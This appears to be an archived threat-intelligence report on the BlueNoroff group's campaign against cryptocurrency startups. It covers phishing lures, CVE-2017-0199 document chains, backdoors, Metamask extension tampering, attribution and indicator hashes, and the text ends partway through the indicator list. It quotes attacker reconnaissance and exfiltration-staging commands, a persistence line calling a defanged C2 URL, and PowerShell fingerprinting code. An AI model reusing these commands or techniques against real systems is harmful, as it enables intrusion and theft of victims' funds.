{ "id": "a293f9c2-40b8-4eb9-b721-34bf430d94a1", "created_at": "2026-04-06T00:16:38.217321Z", "updated_at": "2026-04-10T13:12:47.213474Z", "deleted_at": null, "sha1_hash": "03059c470bc4fbb0a1e94f1a3e9b995e0b7c0a5f", "title": "The BlueNoroff cryptocurrency hunt is still on", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3433430, "plain_text": "The BlueNoroff cryptocurrency hunt is still on\r\nBy Seongsu Park\r\nPublished: 2022-01-13 · Archived: 2026-04-05 16:33:22 UTC\r\nBlueNoroff is the name of an APT group coined by Kaspersky researchers while investigating the notorious attack\r\non Bangladesh’s Central Bank back in 2016. A mysterious group with links to Lazarus and an unusual financial\r\nmotivation for an APT. The group seems to work more like a unit within a larger formation of Lazarus attackers,\r\nwith the ability to tap into its vast resources: be it malware implants, exploits, or infrastructure. See our earlier\r\npublication about BlueNoroff attacks on the banking sector.\r\nAlso, we have previously reported on cryptocurrency-focused BlueNoroff attacks. It appears that BlueNoroff\r\nshifted focus from hitting banks and SWIFT-connected servers to solely cryptocurrency businesses as the main\r\nsource of the group’s illegal income. These attackers even took the long route of building fake cryptocurrency\r\nsoftware development companies in order to trick their victims into installing legitimate-looking applications that\r\neventually receive backdoored updates. We reported about the first variant of such software back in 2018, but\r\nthere were many other samples to be found, which was later reported by the US CISA (Cybersecurity and\r\nInfrastructure Security Agency) in 2021.\r\nThe group is currently active (recent activity was spotted in November 2021).\r\nThe latest BlueNoroff’s infection vector\r\nIf there’s one thing BlueNoroff has been very good at, it’s the abuse of trust. Be it an internal bank server\r\ncommunicating with SWIFT infrastructure to issue fraudulent transactions, cryptocurrency exchange software\r\ninstalling an update with a backdoor to compromise its own user, or other means. Throughout its SnatchCrypto\r\ncampaign, BlueNoroff abused trust in business communications: both internal chats between colleagues and\r\ninteraction with external entities.\r\nAccording to our research this year, we have seen BlueNoroff operators stalking and studying successful\r\ncryptocurrency startups. The goal of the infiltration team is to build a map of interactions between individuals and\r\nunderstand possible topics of interest. This lets them mount high-quality social engineering attacks that look like\r\ntotally normal interactions. A document sent from one colleague to another on a topic, which is currently being\r\ndiscussed, is unlikely to trigger any suspicion. BlueNoroff compromises companies through precise identification\r\nof the necessary people and the topics they are discussing at a given time.\r\nIn a simple scenario, it can appear as a notification of a shared document via Google Drive from one\r\ncolleague/friend to another:\r\nhttps://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/\r\nPage 1 of 28\n\nNote the tiny “X” image – it’s an icon for an image that failed to load. We opened the email on an offline system;\r\nif the system had been connected to the internet, there would be a real icon for a Google document loaded from a\r\nthird-party tracking server that immediately notifies the attacker that the target opened the email.\r\nBut we also observed a slightly more elaborate approach of an email being forwarded from one colleague to\r\nanother. This works even better for the attacker, because the original email and the attachment appear to have\r\nalready been checked by the forwarding party. Ultimately, it elevates the level of trust sufficiently for the\r\ndocument to be opened.\r\nWe haven’t shown the forwarder address as it belongs to an attacked user, but note there is a piece of text that\r\nreads “via sendgrid.net”. There is no website at sendgrid.net, but it can be a domain owned by a US-based\r\ncompany called Sendgrid, that specializes in email distribution, and email marketing campaigns. According to its\r\nwebsite, it offers rich user-tracking capabilities and claims to be sending 90 billion emails every month. It seems\r\nto be a legitimate and reputable business, which is probably why Gmail accepts MIME header customization (or\r\nsender address forgery in the case of an attack) with nothing more than the short remark “via sendgrid.net”. We\r\nhttps://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/\r\nPage 2 of 28\n\ninformed Sendgrid of this activity. Of course, many users could easily overlook the remark or simply not know\r\nwhat it means. The person, whose name was abused here, seems to be in the top management of the Digital\r\nCurrency Group (dcg.co), according to public information. To make it clear, we believe that the employee of the\r\ncompany, or the company itself has nothing to do with this attack or the email.\r\nWhich other company names have they abused? There are many. We have compiled a list of names and logos so\r\nyou can watch out for them in your inbox.\r\nThe companies, whose logos are displayed here, were chosen by BlueNoroff’s for impersonation in social\r\nengineering tricks. Note, this is no proof that the companies listed were compromised.\r\nIf you recognize them in incoming communication, there’s no reason to panic, but proceed with caution. For\r\nexample, you can open the incoming documents in a sandboxed or virtualized offline environment, convert the\r\ndocument to a different format or use a non-standard viewer (i.e., server-side document viewer like GoogleDocs,\r\nCollabora Online, ONLYOFFICE, Microsoft Office Online, etc.).\r\nIn some cases, we saw what looked like the compromise of an existing registered company and the subsequent use\r\nof its resources such as social media accounts, messengers and email to initiate business interaction with the\r\nhttps://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/\r\nPage 3 of 28\n\ntarget. If a venture capital company approaches a startup and sends files that look like an investment contract or\r\nsome other promising documents, the startup won’t hesitate to open them, even if some risk is involved and\r\nMicrosoft Office adds warning messages.\r\nhttps://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/\r\nPage 4 of 28\n\nhttps://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/\r\nPage 5 of 28\n\nA compromised LinkedIn account of an actual company representative was used to approach a target and engage\r\nwith them. The true company’s website is different from the one referenced in the conversation. By manipulating\r\ntrust in this way, BlueNoroff doesn’t even need to burn valuable 0-days. Instead, they can rely on regular macro-enabled documents or older exploits.\r\nWe found they generally stick to CVE-2017-0199, using it again and again before trying something else. The\r\nvulnerability initially allowed automatic execution of a remote script linked to a weaponized document. The\r\nexploit relies on fetching remote content via an embedded URL inside one of the document meta files. An\r\nattentive user may even spot something fishy is happening while MS Word shows a standard loading popup\r\nwindow.\r\nIf the document was opened offline or the remote content was blocked, it presents some legitimate content, likely\r\nscraped or stolen from another party.\r\nhttps://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/\r\nPage 6 of 28\n\nIf the document isn’t blocked from connecting to the internet, it fetches a remote template that is another macro-enabled document. The two documents are like two ingredients of an explosive that when mixed together produce\r\na blast. The first one contains two base64-encoded binary objects (one for 32-bit and 64-bit Windows) declared as\r\nimage data. The second document (the remote template) contains a VBA macro that extracts one of these objects,\r\nspawns a new process (notepad.exe) to inject and execute the binary code. Although the binary objects have JPEG\r\nheaders, they are actually only PE files with modified headers.\r\nInterestingly, BlueNoroff shows improved opsec at this stage. The VBA macro does a cleanup by removing the\r\nbinary objects and the reference to the remote template from the original document and saving it to the same file.\r\nThis essentially de-weaponizes the document leaving investigators scratching their head during analysis.\r\nhttps://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/\r\nPage 7 of 28\n\nAdditionally, we’ve seen that this actor utilized an elevation of privilege (EoP) technique in the initial infection\r\nstage. According to our telemetry, the word.exe process, created by opening the malicious document, spawned the\r\nlegitimate process, dccw.exe. The dccw.exe process is a Windows system file that has auto-elevate permission.\r\nAbusing a dccw.exe file is a known technique and we suspect the malware authors used it to run the next stage\r\nmalware with high privilege. In another case, we have observed word.exe spawning a notepad.exe that received a\r\nhttps://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/\r\nPage 8 of 28\n\nmalware injection and in turn spawning mmc.exe. Unfortunately, the full details of this technique are unavailable\r\ndue to some missing parts.\r\nMalware infection\r\nWe assess that the BlueNoroff group’s interest in cryptocurrency theft started with the SnatchCrypto campaign\r\nthat has been running since at least 2017. While tracking this campaign, we’ve seen several full-infection chains\r\ndeliver malware. For the initial infection vector, they usually utilized zipped Windows shortcut files or\r\nweaponized Word documents. Note that this group has various methods in their infection arsenal and assembles\r\nthe infection chain to suit the situation.\r\nInfection chain #1. Windows shortcut\r\nThe group has been utilizing this infection vector for a long time. The actor sent an archive-type file containing a\r\nshortcut file and document to the victim. All archives used for the initial infection vector had a similar structure.\r\nThe archive contained a document file such as Word, Excel or PDF file that was password protected alongside\r\nanother file disguised as a text file containing the document’s password. This file is in fact a Windows shortcut file\r\nused to fetch the next stage payload.\r\nArchive file and its contents\r\nBefore implanting a Windows executable type backdoor, the malware delivered a Visual Basic Script and\r\nPowershell Script through multiple stages.\r\nInfection chain\r\nhttps://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/\r\nPage 9 of 28\n\nThe fetched VBS file is responsible for fingerprinting the victim by sending basic system information, network\r\nadapter information, and a process list. Next, the Powershell agent is delivered in encoded format. It also sends the\r\nvictim’s general information to the C2 server and next Powershell agent, which is capable of executing commands\r\nfrom the malware operator.\r\nVBS and Powershell delivery chain\r\nUsing this Powershell agent a full-featured backdoor is created, executing with the command line parameter:\r\nrundll32.exe %Public%\\wmc.dll,#1 4ZK0gYlgqN6ZbKd/NNBWTJOINDc+jJHOFH/9poQ+or9l\r\nThe malware checks the command line parameter, decoding it with base64 and decrypting it with an embedded\r\nkey. The decrypted data contains:\r\n63429981 63407466 45.238.25[.]2 443\r\nTo verify the parameter’s legitimacy, the malware XORs the second parameter with the 0x5837 hex value,\r\ncomparing it with the first parameter. If both values match, the malware returns the decrypted C2 address and port.\r\nThe malware also loads a configuration file (%Public%\\Videos\\OfficeIntegrator.dat in this case), decrypting it\r\nusing RC4. This configuration file contains C2 addresses and the next stage payload path will be loaded. The\r\nmalware has enriched backdoor functionalities that can control infected machines:\r\nDirectory/File manipulation\r\nProcess manipulation\r\nRegistry manipulation\r\nExecuting commands\r\nhttps://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/\r\nPage 10 of 28\n\nUpdating configuration\r\nStealing stored data from Chrome, Putty, and WinSCP\r\nThese are used to deploy other malware tools to monitor the victim: a keylogger and screenshot taker.\r\nInfection chain #2. Weaponized Word document\r\nAnother infection chain we’ve seen started from a malicious Word document. This is where the actor utilized\r\nremote template injection (CVE-2017-0199) with an embedded malicious Visual Basic Script. In one file (MD5:\r\ne26725f34ebcc7fa9976dd07bfbbfba3) the remotely fetched template refers to the first stage document and reads\r\nthe encoded payload from it, injecting it to the legitimate process.\r\nRemote template infection chain\r\nThe other case embedded a malicious Visual Basic Script and extracted a Powershell agent on the victim’s system.\r\nGoing through this initial infection procedure results in a Windows executable payload being installed.\r\nInfection chain\r\nhttps://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/\r\nPage 11 of 28\n\nThe persistence backdoor #1 is created in the Start menu path for the persistence mechanism and spawns the first\r\nexport function with the C2 address.\r\nrundll32.exe \"%appdata%\\microsoft\\windows\\start menu\\programs\\maintenance\\default.rdp\",#1\r\nhttps://sharedocs[.]xyz/jyrhl4jowfp/eyi8t5sjli/qzrk8blr_q/rnyyuekwun/yzm1ncj8yb/a3q==\r\nUpon execution, the malware generates a unique installation ID based on the combined hostname, username and\r\ncurrent timestamp, which are concatenated and hashed using a simple string hashing algorithm. After sending a\r\nbeacon to the C2 server, the malware collects general system information, sending it after AES encryption. The\r\ndata received from the server is expected to have the following structure:\r\n@ PROCESS_ID # DLL_FILE_SIZE : DLL_FILE_DATA\r\nThe PROCESS_ID indicates the target process into which the malware will inject a new DLL. DLL_FILE_SIZE\r\nis the size of the DLL file to inject. And lastly, DLL_FILE_DATA contains the actual binary executable file to\r\ninject.\r\nBased on our telemetry, the actor used another type of backdoor. The persistence backdoor #2 is used to silently\r\nrun an additional executable payload that is received over an encrypted channel from a remote server. The server\r\naddress is not hardcoded but rather stored in an encrypted file on the disk\r\n(%WINDIR%\\AppPatch\\PublisherPolicy.tms), whose path is hardcoded in the backdoor. The decrypted\r\nconfiguration file has an identical structure to the configuration file used in Infection chain #1.\r\nAs we can see from the above case, the actor behind this campaign delivered the final payload with multi-stage\r\ninfection and carefully delivered the next payload after checking the fingerprint of the victim. This makes it harder\r\nto collect indicators to respond to the attack. With a strict infection chain, a full-featured Windows executable type\r\nbackdoor is installed. This custom backdoor has long been attributed only to the BlueNoroff group, so we strongly\r\nbelieve that The BlueNoroff group is behind this campaign.\r\nAssets theft\r\nCollecting credentials\r\nOne of the strategies this threat actor usually uses after implanting a full-featured backdoor is the common\r\ndiscovery and collection strategy used by APT threat actors. We managed to identify BlueNoroff’s hands-on\r\nactivities on one victim and observed that the group delivered the final payload very selectively. The malware\r\noperator mostly relied on Windows commands when performing initial profiling. They collected user accounts, IP\r\naddresses and session information:\r\ncmd.exe /c “query session \u003e%temp%\\TMPBFF2.tmp 2\u003e\u00261”\r\ncmd.exe /c “ipconfig /all \u003e%temp%\\TMPEEE2.tmp 2\u003e\u00261”\r\ncmd.exe /c “whoami \u003e%temp%\\TMP218C.tmp 2\u003e\u00261”\r\ncmd.exe /c “net user [user account] /domain \u003e%temp%\\TMP4B7C.tmp 2\u003e\u00261”\r\nhttps://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/\r\nPage 12 of 28\n\ncmd.exe /c “net localgroup administrators \u003e%temp%\\TMP9518.tmp 2\u003e\u00261”\r\ncmd.exe /c “query session \u003e%temp%\\TMPBFF2.tmp 2\u003e\u00261”\r\ncmd.exe /c “ipconfig /all \u003e%temp%\\TMPEEE2.tmp 2\u003e\u00261”\r\nIn the collection phase, the malware operator also relied on Windows commands. After finding folders of interest,\r\nthey copied a folder named 策略档案 (Chinese for “Policy file“) to the previously created “MM” folder for\r\nexfiltration. Also, they collected a configuration file related to cryptocurrency software in order to extract possible\r\ncredentials or other account details.\r\ncmd.exe /c “mkdir %public%\\MM \u003e%temp%\\TMPF522.tmp 2\u003e\u00261”\r\nxcopy “%user%\\Desktop\\[redacted]工作文档\\MM策略档案” %public%\\MM /S /E /Q /Y\r\ncmd.exe /c “rd /s /q %public%\\MM \u003e%temp%\\TMP729D.tmp 2\u003e\u00261”\r\ncmd.exe /c “type D:\\2\\Crypt[redacted]\\Crypt[redacted].conf \u003e%temp%\\TMP496B.tmp 2\u003e\u00261″\r\nFrom one victim, we discovered that the operators manually copied a file that was created by one of the\r\nmonitoring utilities (such as screenshot or keystroke data) to the %TEMP% folder in order to be sent to an\r\nattacker-controlled remote resource.\r\ncmd.exe /c “copy “%appdata%\\Microsoft\\Feeds\\Creds_5FADD329.dat” %public%\\\r\n\u003e%temp%\\TMP11C4.tmp 2\u003e\u00261″\r\nStealing cryptocurrency\r\nIn some cases where the attackers realized they had found a prominent target, they carefully monitored the user\r\nfor weeks or months. They collected keystrokes and monitored the user’s daily operations, while planning a\r\nstrategy for financial theft.\r\nIf the attackers realize that the target uses a popular browser extension to manage crypto wallets (such as the\r\nMetamask extension), they change the extension source from Web Store to local storage and replace the core\r\nextension component (backgorund.js) with a tampered version. At first, they are interested in monitoring\r\ntransactions. The screenshot below shows a comparison of two files: a legitimate Metamask background.js file\r\nand its compromised variant with injected lines of code highlighted in yellow. You can see that in this case they set\r\nup monitoring of transactions between a particular sender and recipient address. We believe they have a vast\r\nmonitoring infrastructure that triggers a notification upon discovering large transfers.\r\nhttps://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/\r\nPage 13 of 28\n\nThe details of the transaction are automatically submitted via HTTP to a C2 server:\r\nIn another case, they realized that the user owned a substantial amount of cryptocurrency, but used a hardware\r\nwallet. The same method was used to steal funds from that user: they intercepted the transaction process and\r\ninjected their own logic.\r\nAll this sounds easy, but in fact requires a thorough analysis of the Metamask Chrome extension, which is over\r\n6MB of JavaScript code (about 170,000 lines of code) and implementation of a code injection that rewrites\r\ntransaction details on demand when the extension is used.\r\nhttps://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/\r\nPage 14 of 28\n\nThis way, when the compromised user transfers funds to another account, the transaction is signed on the\r\nhardware wallet. However, given that the action was initiated by the user at the very right moment, the user\r\ndoesn’t suspect anything fishy is going on and confirms the transaction on the secure device without paying\r\nattention to the transaction details. The user doesn’t get too worried when the size of the payment he/she inputs is\r\nlow and the mistake feels insignificant. However, the attackers modify not only the recipient address, but also\r\npush the amount of currency to the limit, essentially draining the account in one move.\r\nThe injection is very hard to find manually unless you are very familiar with the Metamask codebase. However, a\r\nmodification of the Chrome extension leaves a trace. The browser has to be switched to Developer mode and the\r\nMetamask extension is installed from a local directory instead of the online store. If the plugin comes from the\r\nstore, Chrome enforces digital signature validation for the code and guarantees code integrity. So, if you are in\r\ndoubt, immediately check your Metamask extension and Chrome settings.\r\nDeveloper mode enabled in Google Chrome\r\nhttps://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/\r\nPage 15 of 28\n\nIf you use Developer mode, make sure your important extensions come from the Web Store\r\nUnless you are a Metamask developer yourself, this may indicate a Trojanized extension\r\nSnatchCrypto’s victims\r\nThe target of the SnatchCrypto campaign is not limited to specific countries and continents. This campaign is\r\naimed at various companies that by the nature of their work deal with cryptocurrencies and smart contracts, DeFi,\r\nblockchains, and FinTech industry.\r\nAccording to our telemetry, we discovered victims from Russia, Poland, Slovenia, Ukraine, the Czech Republic,\r\nChina, India, the US, Hong Kong, Singapore, the UAE and Vietnam. However, based on the shortened URL click\r\nhistory and decoy documents, we assess there were more victims of this financially motivated attack campaign.\r\nhttps://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/\r\nPage 16 of 28\n\nBlueNoroff victims\r\nIn addition to the above-mentioned countries, we observed uploads of weaponized documents and compromised\r\nMetamask extensions from Indonesia, the UK, Sweden, Germany, Bulgaria, Estonia, Russia, Malta and Portugal.\r\nSnatchCrypto’s attribution\r\nWe assess with high confidence that the financially motivated BlueNoroff group is behind this campaign. As a\r\nresult of understanding the SnatchCrypto campaign’s full chain of infection, we can identify several overlaps with\r\nthe BlueNoroff group’s previous activities.\r\nVBA macro authorship\r\nAnalysis of the VBA macro from the remote template used during the initial infection revealed that the code\r\nmatched the style and technique previously used by Clément Labro, an offensive security researcher from the\r\ncompany SCRT based out of Morges, Vaud, Switzerland. The original code for process injection from the VBA\r\nmacro hasn’t been found in the public, so either Clément has privately developed it and later it became available\r\nto BlueNoroff, or someone adapted his other VBA code, such as the VBA-RunPE project.\r\nPowerShell scripts overlap\r\nOne tool this group relied heavily on is the PowerShell script. Through an initial infection they deployed\r\nPowerShell agents on several victims, sending basic system information and executing commands from the\r\ncontrol server. They have utilized this PowerShell continuously, while adding small updates.\r\nPowerShell script used in previous BlueNoroff\r\ncampaign\r\nPowerShell script used in 2021 campaign\r\nfunction GetBasicInformation\r\n{\r\nfunction GetBI\r\n{\r\nhttps://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/\r\nPage 17 of 28\n\n$HostName =\r\n[System.Environment]::MachineName;\r\n$UserName = [System.Environment]::UserName;\r\n$DomainName =\r\n[System.Environment]::UserDomainName;\r\n$CurrentDir =\r\n[System.Environment]::CurrentDirectory;\r\n$BinPath =\r\n[System.Environment]::GetCommandLineArgs()\r\n[0];\r\n$OSVersion =\r\n[System.Environment]::OSVersion.VersionString;\r\n$Is64BitOS =\r\n[System.Environment]::Is64BitOperatingSystem;\r\n$Is64BitProcess =\r\n[System.Environment]::Is64BitProcess;\r\n$PSVersion = ‘PS ‘ +\r\n[System.Environment]::Version;\r\n$BasicInformation = $HostName + ‘|’ +\r\n$UserName + ‘|’ + $DomainName + ‘|’ +\r\n$CurrentDir + ‘|’ + $BinPath + ‘|’ + $OSVersion +\r\n‘|’ + $Is64BitOS + ‘|’ + $Is64BitProcess + ‘|’ +\r\n$PSVersion;\r\nreturn $BasicInformation;\r\n}function ProcessCommand\r\n{\r\n$HostName = [System.Environment]::MachineName;\r\n$UserName = [System.Environment]::UserName;\r\n$DomainName =\r\n[System.Environment]::UserDomainName;\r\n$CurrentDir =\r\n[System.Environment]::CurrentDirectory;\r\n$BinPath =\r\n[System.Environment]::GetCommandLineArgs()[0];\r\n$OSVersion =\r\n[System.Environment]::OSVersion.VersionString;\r\n$Is64BitOS =\r\n[System.Environment]::Is64BitOperatingSystem;\r\n$Is64BitProcess =\r\n[System.Environment]::Is64BitProcess;\r\n$PSVersion =\r\n[System.Environment]::Version;$BasicInformation =\r\n$HostName + ‘|’ + $UserName + ‘|’ + $DomainName\r\n+ ‘|’ + $CurrentDir + ‘|’ + $BinPath + ‘|’ +\r\n$OSVersion + ‘|’ + $Is64BitOS + ‘|’ + $Is64BitProcess\r\n+ ‘|’ + $PSVersion;return $BasicInformation;\r\n}function ProcessCommand\r\n{\r\nBackdoor overlap\r\nThrough the complicated infection chain, a Windows executable type backdoor is eventually installed on the\r\nvictim machine. We can only identify this backdoor malware from a few hosts. It has many code similarities with\r\npreviously known BlueNoroff malware. Using Kaspersky Threat Attribution Engine (KTAE), we see that the\r\nmalware binaries used in this campaign have considerable code similaritis with known tools of the BlueNoroff\r\ngroup.\r\nhttps://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/\r\nPage 18 of 28\n\nCode similarity of backdoor\r\nIn addition, we can identify uncommon techniques usually discovered from the BlueNoroff group’s malware. The\r\ngroup’s malware acquires a real C2 address by XORing the resolved IP address with a hardcoded DWORD value.\r\nWe saw the same technique in our previous BlueNoroff report. The malware used in the SnatchCrypto campaign\r\nalso used the same technique to acquire real C2 addresses.\r\nSimilar C2 address acquiring scheme\r\nIn addition, based on the metadata of the Windows shortcut files, we found that the actor behind this campaign is\r\nfamiliar with the Korean operating system environment.\r\n[String Data]\r\nWorking Directory (UNICODE):   %currentdir%\r\nArguments (UNICODE):   hxxps://bit[.]ly/2Q9tfCz\r\nIcon location (UNICODE):   C:\\Windows\\notepad.exe\r\n[Console Code Page]\r\nCode page: 949 (EUC-KR)\r\nBlueNoroff’s indicators of compromise\r\nMalicious shortcut files\r\n033609f8672303feb70a4c0f80243349\r\n2100e6e585f0a2a43f47093b6fabde74\r\n4a3de148b5df41a56bde78a5dcf41975\r\n5af886030204952ae243eedd25dd43c4    Password.txt.lnk\r\n5f761f9aa3c1a76b17f584b9547a01a7    Password.txt.lnk\r\n7a4a0b0f82e63941713ffd97c127dac8    Password.txt.lnk\r\n813203e18dc1cc8c70d36ed691ca0df3\r\n961e6ec465d7354a8316393b30f9c6e9    Gdpr Password.txt.lnk\r\n9ea244f0a0a955e43293e640bb4ee646\r\na3c61de3938e7599c0199d2778f7d417    Password.txt.lnk\r\nhttps://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/\r\nPage 19 of 28\n\na5d4bfc3eab1a28ffbcba67625d8292e\r\na94529063c3acdbfa770657e9126b56d\r\nab095cb9bc84f37a0a655fbc00e5f50e\r\nb52d30d1db40d5d3c375c4a7c8a115c1\r\ndd2569684ca52ed176f1619ecbfa7aaa\r\ndff21849756eca89ebfaa33ed3185d95\r\ne18dd8e61c736cfc6fff86b07a352c12\r\ne546b851ac4fa5a111d10f40260b1466\r\ne6e64c511f935d31a8859e9f3147fe24    Password.txt.lnk\r\nea7ed84f7936d4cbafa7cec51fe39cf7\r\nf414f6590636037a6ec92a4d951bdf55\r\n4e207d6e930db4293a6d720cf47858fc\r\n5e44deca6209e64f4093beae92db0c93    Password.txt.lnk\r\n84c427e002fd162d596f3f43ce86fd6a    Password.txt.lnk\r\nc16977fefbdc825a5c6760d2b4ea3914\r\ne5d12ef32f9bd3235d0ac45013040589\r\n09bca3ddbc55f22577d2f3a7fda22d1c    Password.txt.lnk\r\n0eb71e4d2978547bd96221548548e9f0    Password.txt.lnk\r\nda599b0cde613b5512c13f299fec739e    Password.txt.lnk\r\n0c9170a2584ceeddb89e4c0f0a2353ed    Password.txt.lnk\r\n5053103dd5d075c1dc54edf1f8568098    Password.txt.lnk\r\n536bae311c99a4d46f503c68595d4431    Password.txt.lnk\r\n3078265f207fed66470436da07343732    Password.txt.lnk\r\n15f1ae1fed1b2ea71fdb9661823663c6    Password.txt.lnk\r\n56fe283ca3e1c1667191cc7764c260b6    Password.txt.lnk\r\n850751de7b8e158d86469d22ad1c3101    Password.txt.lnk\r\n1a8282f73f393656996107b6ec038dd5    Password.txt.lnk\r\n2ea2ceab1588810961d2fc545e2f957e    Password.txt.lnk\r\n561f70411449b327e3f19d81bb2cea08    Password.txt.lnk\r\n3812cdc4225182326b1425c9f3c2d50b    Password.txt.lnk\r\n4274e6dbc2b7aee4ef080d19fff47ce7    Password.txt.lnk\r\n427bdfe4425e6c8e3ea41d89a2f55870    Password.txt.lnk\r\n7a83be17f4628459e120a64fcab70bac    Password.txt.lnk\r\n5d662269739f1b81072e4c7e48972420    Password.txt.lnk\r\n244a23172af8720882ae0141292f5c47    Password.txt.lnk\r\na8e2c94abb4c1e77068a5e2d8943296c    Password.txt.lnk\r\n89c26cefa057cf21054e64b5560bf583    Xbox.lnk\r\n805949896d8609412732ee7bfb44900a    Password.txt.lnk\r\na2be99a5aa26155e6e42a17fbe4fd54d    Security Bugs in rigs.pdf.lnk\r\n28917b4187b3b181e750bf024c6adf70    readme.txt.lnk\r\n9f8e51f4adc007bb0364dfafb19a8c11    UserAssist.lnk\r\n790a21734604b374cf260d20770bfc96    SALT Lending Opportunities.pdf.lnk\r\nhttps://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/\r\nPage 20 of 28\n\ndb315d7b0d9e8c9ca0aa6892202d498b    Password.txt.lnk\r\n02904e802b5dc2f85eec83e3c1948374    Security Bugs in Operation.pdf.lnk\r\nbaebc60beaced775551ec23a691c3da6\r\n302314d503ae88058cb4c33a6ac6b79b    Password.txt.lnk\r\naeac6f569fb9a7d3f32517aa16e430d6    Password.txt.lnk\r\n926DEEAF253636521C26442938013204\r\n8064e00b931c1cab6ba329d665ea599c    MSEdge.lnk\r\nbcb4a8f190f2124be57496649078e0ae\r\n781a20f27b72c1c901164ce1d025f641    MSAssist.lnk\r\n483e3e0b1dceb4a5a13de65d3556c3fe    MSAssist.lnk\r\nMalicious documents\r\n00a63a302dcaffc9f28826e9dba30e03    Abies VC Presentation.docx\r\nee9dda6bbbb1138263873dbef36a4d42    Abies VC Presentation.docx\r\n0f1c81c2023eae0fc092ce9f58213bcf    Abies VC Presentation.docx\r\n491e0d776f01f102d36155a46f1a8e3c    Ant Capital Presentation (Azure Protected).docx\r\nc33ce08ebcc6e508bb3a17e0fa7b08f8    Global Brain Pitch Deck.docx\r\nb1911ef720b17aeed69ec41c8e94cc1e\r\n340fb219872ce3c0d3acf924f4f9e598    Venture Labo Investment Pitch Deck.docx\r\n380e9e78dc5bc91fb6cdd8b4a875f20a\r\neb18ac97dba79ea48c185fb2826467fe\r\n2a9ff6d80cdd4aeed1c48a1ccdc525dd    Abies VC Presentation.docx\r\necf75bec770edcd89a3c16d3c4edde1a    Abies VC Presentation (1).docx\r\n6c4943f4c28a07ee8cae41dad16d72b3    Abies VC Presentation.docx\r\nf76e2e6bfbee77ae36049880d7c227f7    Abies VC Presentation.docx\r\n7aec3d1b24ed0946ab740924be5834fa    Abies VC Presentation.docx\r\n47e325e3467bfa80055b7c0eebb11212    Abies VC Presentation.docx\r\n1e0d96c551ca31a4055491edc17ce2dd    Abies VC Presentation.docx\r\nbcf97660ce2b09cbffb454aa5436c9a0    Digital Asset Investment Stategy 2020 (ISO 27001).docx\r\n13ff15ac54a297796e558bb96feaacfd    Abies VC Presentation(ISO 27001).docx\r\ncace67b3ea1ce95298933e38311f6d0b    Adviser-Non-Disclosure-Agreement-NDA(ISO 27001).docx\r\n645adf057b55ef731e624ab435a41757    OKEx and DeepMind Intro Deck(ISO 27001_Protected).docx\r\nbde4747408ce3cfdfe8238a133ebcac9    Circle Business Introduction(ISO 27001).docx\r\n421b1e1ab9951d5b8eeda5b041cb0657    Berkshire Hathaway HomeServices Custody – Mutual NDA.docx\r\nd2f08e227cd528ad8b26e9bbe285ae3c    Union Square Ventures Partnership – Mutual NDA Form.docx\r\n04deb35316ebe1789da042c8876c0622    Chiliz Partnership – Mutual NDA Form.docx\r\naf4eefa8cddc1e412fe91ad33199bd71    FasterCapital Mutual NDA Form.docx\r\n34239a3607d8b5b8ddd6797855f2e827    FasterCapital Introduction 2020 Oct.docx\r\n389172d2794d789727b9f7d01ec27f75    Lundbergs NDA Mutual Form.docx\r\nf40e7998a84495648b0338bc016b9417    Union Square Ventures Partnership – Mutual NDA Form.docx\r\nc8c2a9c50ff848342b0885292d5a8cd4    VIRUS.docx\r\nadf9dc317272dc3724895cb07631c361    Non-Disclosure-Agreement-NDA(ISO 27001).docx\r\n158d84c90a79edb97ec5b840d86217c7    Venture Labo Investment Pitch Deck.docx\r\nhttps://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/\r\nPage 21 of 28\n\ne26725f34ebcc7fa9976dd07bfbbfba3    Global Brain Pitch Deck.docx\r\na435acb5bac92b855d1799a685507522\r\n9969b67ef643bed20a38346dcd69bec4\r\na6446bfea82b69169b4026222ca253b2\r\nbdf1643c3a10a25d3aba2c4c608ec5d5\r\nb4b695c8e6fea95db5843a43644f88b0\r\nd8561c74ad9624d7c35c0fb15d3ca8fe\r\nf9195b14ed20b30b7c239d50e6418151\r\n3dd638551b03a36d13428696dcada5d8\r\nf26eaa212c503aaba6e5015cb8ef44b5     Venture Labo Investment Pitch Deck.docx\r\n793de76de6d4015ebdd5e552ac5b2f90    Pantera Capital Investment Agreement(Protected).docx\r\n709ec9fbbc3c37ccd39758527c332b84    Pantera Capital Investment Agreement(Protected).docx\r\n89099235aad37a29b7acedc96fda0037    Venture Labo Investment Pitch Deck.docx\r\n358791e1abd64f490c865643a3fbb93d    Z Venture Capital Presentation(Protected).docx\r\ncea54a904434c66f217fbadc571e1507    Z Venture Capital Presentation(Protected).docx\r\n9be0075b9344590b3cabf61c194db180    Rapid Change of Stablecoin (Protected).docx\r\n98e30453bbf1c9c9f48368f9bbe69edd    Z Venture Capital Presentation(Protected).docx\r\n9ad7b21603ecce5ee744ba8aa387fb6c    Pantera Capital Investment Agreement(Protected).docx.123.docx.123\r\nInjected remote template\r\n3dd638551b03a36d13428696dcada5d8\r\n2da244dc9bbdbf2013b7fbc2a74073a2\r\nf3157dc297cb802c8ae2f07702903bfa\r\nVisual Basic 